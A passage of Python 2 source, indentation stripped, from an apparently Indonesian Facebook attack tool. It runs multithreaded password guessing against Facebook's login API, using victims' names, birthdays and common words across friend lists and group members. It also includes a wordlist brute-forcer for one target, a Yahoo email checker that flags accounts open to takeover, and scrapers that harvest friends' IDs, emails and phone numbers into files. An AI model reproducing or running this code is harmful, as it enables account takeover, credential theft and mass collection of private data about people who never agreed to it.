url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + passw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = urllib.urlopen(url)
mpsh = json.load(data)
if back == len(up):
break
if 'access_token' in mpsh:
bisa = open('Berhasil.txt', 'w')
bisa.write(username + ' | ' + passw + '\n')
bisa.close()
berhasil.append('\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
if 'www.facebook.com' in mpsh['error_msg']:
cek = open('Cekpoint.txt', 'w')
cek.write(username + ' | ' + passw + '\n')
cek.close()
cekpoint.append('\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + username + ' | ' + passw)
back += 1
else:
gagal.append(username)
back += 1
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m ' + str(back) + ' \x1b[1;96m>\x1b[1;97m ' + str(len(up)) + ' =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96m' + str(len(berhasil)) + ' \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96m' + str(len(cekpoint)))
sys.stdout.flush()
except IOError:
print '\n\x1b[1;91m[!] Connection busy'
time.sleep(1)
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
def hasil():
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
for b in berhasil:
print b
for c in cekpoint:
print c
print
print '\x1b[31m[x] Failed \x1b[1;97m--> ' + str(len(gagal))
keluar()
def super():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Crack from Friends'
print '║-> \x1b[1;37;40m2. Crack from Group'
print '║-> \x1b[1;37;40m3. Crack from File'
print '║-> \x1b[1;31;40m0. Kembali'
print '\x1b[1;37;40m║'
pilih_super()
def pilih_super():
peak = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if peak == '':
print '\x1b[1;91m[!] Can\'t empty'
pilih_super()
else:
if peak == '1':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[+] \x1b[1;92mMengambil id Teman \x1b[1;97m...')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
else:
if peak == '2':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idg = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + idg + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
re = requests.get('https://graph.facebook.com/' + idg + '/members?fields=name,id&limit=999999999&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
id.append(i['id'])
else:
if peak == '3':
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
idlist = raw_input('\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
else:
if peak == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + peak + ' \x1b[1;91mTidak ada'
pilih_super()
print '\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97m' + str(len(id))
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
titik = ['. ', '.. ', '... ']
for o in titik:
print '\r\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97m' + o,
sys.stdout.flush()
time.sleep(1)
print
print 52 * '\x1b[1;97m\xe2\x95\x90'
def main(arg):
user = arg
try:
a = requests.get('https://graph.facebook.com/' + user + '/?access_token=' + toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass1
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass1
else:
pass2 = b['firs_name'] + '12345'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass2
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass2
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass3
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass3
else:
lahir = b['birthday']
pass4 = lahir.replace('/', '')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass4
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass4
else:
pass5 = ('sayang')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass5
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass5
else:
pass6 = ('sayangku')
data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + user + '&locale=en_US&password=' + pass6 + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;97m[\x1b[1;92m\xe2\x9c\x93\x1b[1;97m] ' + user + ' | ' + pass6
else:
if 'www.facebook.com' in q['error_msg']:
print '\x1b[1;97m[\x1b[1;93m\xe2\x9c\x9a\x1b[1;97m] ' + user + ' | ' + pass6
except:
pass
p = ThreadPool(30)
p.map(main, id)
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
super()
def brute():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print '╔' + 52 * '\x1b[1;97m\xe2\x95\x90'
try:
email = raw_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')
passw = raw_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')
total = open(passw, 'r')
total = total.readlines()
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
sandi = open(passw, 'r')
for pw in sandi:
try:
pw = pw.replace('\n', '')
sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)
sys.stdout.flush()
data = requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + email + '&locale=en_US&password=' + pw + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
dapat = open('Brute.txt', 'w')
dapat.write(email + ' | ' + pw + '\n')
dapat.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
else:
if 'www.facebook.com' in mpsh['error_msg']:
ceks = open('Brutecekpoint.txt', 'w')
ceks.write(email + ' | ' + pw + '\n')
ceks.close()
print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw
keluar()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[!] Connection Error'
time.sleep(1)
except IOError:
print '\x1b[1;91m[!] File not found...'
print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'
tanyaw()
def tanyaw():
why = raw_input('\x1b[1;91m[?] \x1b[1;92mAre you sure want to make wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')
if why == '':
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
else:
if why == 'y':
wordlist()
else:
if why == 'Y':
wordlist()
else:
if why == 't':
menu_hack()
else:
if why == 'T':
menu_hack()
else:
print '\x1b[1;91m[!] Please choice \x1b[1;97m(y/t)'
tanyaw()
def menu_yahoo():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. From Friends'
print '║-> \x1b[1;37;40m2. From File'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
yahoo_pilih()
def yahoo_pilih():
go = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if go == '':
print '\x1b[1;91m[!] Can\'t empty'
yahoo_pilih()
else:
if go == '1':
yahoofriends()
else:
if go == '2':
yahoolist()
else:
if go == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mnot found'
yahoo_pilih()
def yahoofriends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
